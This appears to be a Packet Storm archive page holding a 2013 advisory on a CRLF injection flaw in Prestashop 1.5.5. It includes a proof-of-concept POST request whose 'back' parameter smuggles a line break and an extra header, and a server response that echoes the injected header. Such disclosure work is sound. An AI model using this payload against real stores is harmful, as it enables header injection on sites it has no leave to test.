exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Prestashop 1.5.5 CRLF Injection

Prestashop 1.5.5 CRLF Injection
Posted Sep 6, 2013
Authored by Esac

Prestashop version 1.5.5 suffers from a CRLF injection vulnerability that allows for addition of headers.

tags | exploit
SHA-256 | 76e11c6fad585bb149fe9e1d09d6e10d9aa7b78f8c9bf9542b95b03374199d9c

Prestashop 1.5.5 CRLF Injection

Change Mirror Download
##############################################################
#Exploit Title: Prestashop v1.5.5 - CRLF Injection Vulnerability
#Official site: https://www.prestashop.com
#Official Demo : https://demo-store.prestashop.com/
#Risk Level: Medium
#Exploit Author: Esac
#Homepage author : www.iss4m.ma
#Email author : s3cpr0@hotmail.fr
#Last Checked: 06/09/2013
#############################################################


+----------+
| OVERVIEW |
+----------+

PrestaShop is the most reliable and flexible Open-source e-commerce software. Since 2007,PrestaShop has revolutionized the industry by providing features that
engage shoppers and increase online sales. The Prestateam consists of over 100 passionate individuals and more than 350,000 community members dedicated to innovated technology.
It has more than 2.000.000 downloads and won the best open-source e-commerce software in the last few years.

When installing and analyzing PrestaShop on a secure environment I discovered that it's vulnerable for CRLF injection vulnerability that may allow an attacker to include extra HTTP headers when viewing web pages. If Prestashop is called from the command line, carriage return and line feed (CRLF) characters may be included in the specified URL. These characters are not escaped when the input is used to construct a HTTP request.
 
Exploitation of this flaw may allow an attacker to inject additional HTTP headers into a request. Abuse of the 'Host' header may cause the request to be served as if made to a different domain, possibly providing the attacker with more control over the content returned.
 
This vulnerability has been reported for Prestashop v1.5.5 and may be other versions are affected.


+---------------------------------------------------------------------------------------+


HTTP Headers Request :


POST /fr/adresse HTTP/1.1
Content-Length: 389
Content-Type: application/x-www-form-urlencoded
Cookie: 8812c36aa5ae336c2a77bf63211d899a=rxc6j6QPVlrzbhxxTrmza5dULYmyAKDhJ0WCO6VbDZGtZ3A7mQpE2jo2VD0mzY3wtqIllwzMGZBW7L0qZdiAlcqODbY7WKgoRufq%2FD7sY1qWm9tfzSi%2Bbp5Kq1iZcqteC%2B%2B2PgcezzDqkYvkLpZmoruDESRNupRzovjCTk6tYo%2FnZ1XSPqG6ppkQ4JDwpkC%2FKJICffmBAL4wdyQLMaPpI28zLcNO5RllSKt1Cr7UAU%2FWjh5WE2c%2B9eEYggZz%2F8h2f27ZFWqk38a5w0XlcaowDcYqoKAukCtfAaRUf0jmu9%2F9VXGhEhHBfdzowcl8N3l7EnMeOt9Lz4%2BIHOFAIte%2Fl4IcACiACBve7upfqOhpO6yyvF%2FpVlP%2FshYn049ymXIPjxD%2FHkE1HdVRsID5gETojPq0vjvbOeVorChNVV6zNpc%2FyFXS7BTDuF7OJyGZ8MWF5WPAYXwwa7MJ%2BqpeN9pv9c6s18SV5LhAB%2Bz7dA3%2BYZz4vE%2BAFoczry8Vh0ijOICgGGr4hYKm51D3wGkqO0lLNZowKzQVgJqWqSLngur8z4I%3D000404
Host: demo-store.prestashop.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*

address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&alias=1&back=%0D%0A%20ZSL%2DCustom%2DHeader%3Alove_injection&city=San%20Francisco&company=Acunetix&dni=1&firstname=tdupumgx&id_country=231&id_state=&lastname=carbrbbm&other=1&phone=555-666-0606&phone_mobile=555-666-0606&postcode=94102&select_address=1&submitAddress=Valider&token=fa85a76b06b6cd05245288ea8006175a&vat_number=1


HTTP Headers Response :

HTTP/1.1 302 Found
Date: Wed, 28 Aug 2013 10:28:39 GMT
Server: Apache
Set-Cookie: 8812c36aa5ae336c2a77bf63211d899a=rxc6j6QPVlrzbhxxTrmza5dULYmyAKDhJ0WCO6VbDZG1%2BptPMOxtxYYBfzPV0v8ktqIllwzMGZBW7L0qZdiAlcqODbY7WKgoRufq%2FD7sY1qWm9tfzSi%2Bbp5Kq1iZcqteC%2B%2B2PgcezzDqkYvkLpZmoruDESRNupRzovjCTk6tYo%2FnZ1XSPqG6ppkQ4JDwpkC%2FKJICffmBAL4wdyQLMaPpI28zLcNO5RllSKt1Cr7UAU%2FWjh5WE2c%2B9eEYggZz%2F8h2f27ZFWqk38a5w0XlcaowDcYqoKAukCtfAaRUf0jmu9%2F9VXGhEhHBfdzowcl8N3l7EnMeOt9Lz4%2BIHOFAIte%2Fl4IcACiACBve7upfqOhpO6yyvF%2FpVlP%2FshYn049ymXIPjxD%2FHkE1HdVRsID5gETojPq0vjvbOeVorChNVV6zNpc%2FyFXS7BTDuF7OJyGZ8MWF5WPAYXwwa7MJ%2BqpeN9pv9c6s18SV5LhAB%2Bz7dA3%2BYZz4vE%2BAFoczry8Vh0ijOICgq4zKl3PuSt10RxAAYjxEcdQEEu5W1AjY6PXJwUz1e34%3D000404; expires=Tue, 17-Sep-2013 10:28:39 GMT; path=/; domain=demo-store.prestashop.com; httponly
Location: https://demo-store.prestashop.com/fr/
ZSL-Custom-Header:love_injection
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8



+----------------------------------------------------------------------------------------+

Knowledge is not an Object , it's a flaw :)
Greetz : White Tarbouch TEAM - Cobra
WwW.Iss4m.Ma
./Issam IEBOUBEN Aka Esac
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    69 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close